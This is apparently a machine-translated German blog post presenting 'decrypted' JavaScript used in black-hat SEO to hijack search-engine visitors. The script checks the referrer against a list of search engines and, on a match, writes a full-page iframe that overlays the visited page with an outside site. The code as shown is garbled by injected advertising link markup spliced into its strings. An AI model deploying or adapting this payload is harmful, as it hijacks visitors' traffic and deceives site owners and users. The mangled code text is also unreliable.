Ich habe heute beim Surfen im Internet zufällig diesen JS-Hijacking-Suchmaschinencode entdeckt. Das Kapern des normalen Suchverkehrs von Suchmaschinen ist eine häufige Hijacking-Methode, die von Black-Hat-SEO verwendet wird. Es wurde speziell entschlüsselt, damit jeder sein Hijacking-Prinzip verstehen kann.
Hilfe zum Drucken des Quellcodes
<SCRIPT language="<span id="0_nwp" style="width: auto; height: auto; float: none;"><a id="0_nwl" href="http://m.sbmmt.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=javascript&k0=javascript&kdi0=0&luki=8&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="0" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">javascript</span></a></span>"> var _$ = ["google", "aol", "yahoo", "bing", "msn", "hotbot", "go", "searchengine", "altavista", "goto", "excite", "slider", "musicsearch", "lycos", "look<span id="1_nwp" style="width: auto; height: auto; float: none;"><a id="1_nwl" href="http://m.sbmmt.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=smart&k0=smart&kdi0=0&luki=3&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="1" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">smart</span></a></span>", "netscape", "search", "ask", "Mahalo", "dogpile", "S-R", "webcrawler", "yandex", "splut", "fireball", "wlw", "suche", "godado", "tiscali", "iltrovatore", "abacho", "<div <span id="2_nwp" style="width: auto; height: auto; float: none;"><a id="2_nwl" href="http://m.sbmmt.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=style&k0=style&kdi0=0&luki=6&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="2" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">style</span></a></span>=\"z-index:10043;background-color:#ffffff;right:0px;position:absolute;tex-align:center;width:100%;height:100%;top:0px;left:0px;\"><iframe id=\"rf\" scrolling=\"no\" frameborder=\"0\" style=\"width:100%;height:2043px;display:<span id="3_nwp" style="width: auto; height: auto; float: none;"><a id="3_nwl" href="http://m.sbmmt.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=block&k0=block&kdi0=0&luki=5&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="3" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">block</span></a></span>;visibility:visible;\" <span id="4_nwp" style="width: auto; height: auto; float: none;"><a id="4_nwl" href="http://m.sbmmt.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=src&k0=src&kdi0=0&luki=4&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="4" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">src</span></a></span>=\"http://www.5ixuexiwang.com/\" allowtransparency=\"true\"></div>"]; var a = window["document"]["referrer"]; if (a["indexOf"](_$[0]) > 0x0 || a["indexOf"](_$[1]) > 0x0 || a["indexOf"](_$[2]) > 0x0 || a["indexOf"](_$[3]) > 0x0 || a["indexOf"](_$[4]) > 0x0 || a["indexOf"](_$[5]) > 0x0 || a["indexOf"](_$[6]) > 0x0 || a["indexOf"](_$[7]) > 0x0 || a["indexOf"](_$[8]) > 0x0 || a["indexOf"](_$[9]) > 0x0 || a["indexOf"](_$[10]) > 0x0 || a["indexOf"](_$[11]) > 0x0 || a["indexOf"](_$[12]) > 0x0 || a["indexOf"](_$[13]) > 0x0 || a["indexOf"](_$[14]) > 0x0 || a["indexOf"](_$[15]) > 0x0 || a["indexOf"](_$[16]) > 0x0 || a["indexOf"](_$[17]) > 0x0 || a["indexOf"](_$[18]) > 0x0 || a["indexOf"](_$[19]) > 0x0 || a["indexOf"](_$[20]) > 0x0 || a["indexOf"](_$[21]) > 0x0 || a["indexOf"](_$[22]) > 0x0 || a["indexOf"](_$[23]) > 0x0 || a["indexOf"](_$[24]) > 0x0 || a["indexOf"](_$[25]) > 0x0 || a["indexOf"](_$[26]) > 0x0 || a["indexOf"](_$[27]) > 0x0 || a["indexOf"](_$[28]) > 0x0 || a["indexOf"](_$[29]) > 0x0 || a["indexOf"](_$[30]) > 0x0) { window["document"]["writeln"](_$[31]) } </SCRIPT>
Bei dem oben genannten Inhalt handelt es sich um das Black-Hat-SEO-Hijacking-Programm und den von Ihnen geteilten JS-Hijacking-Suchmaschinencode.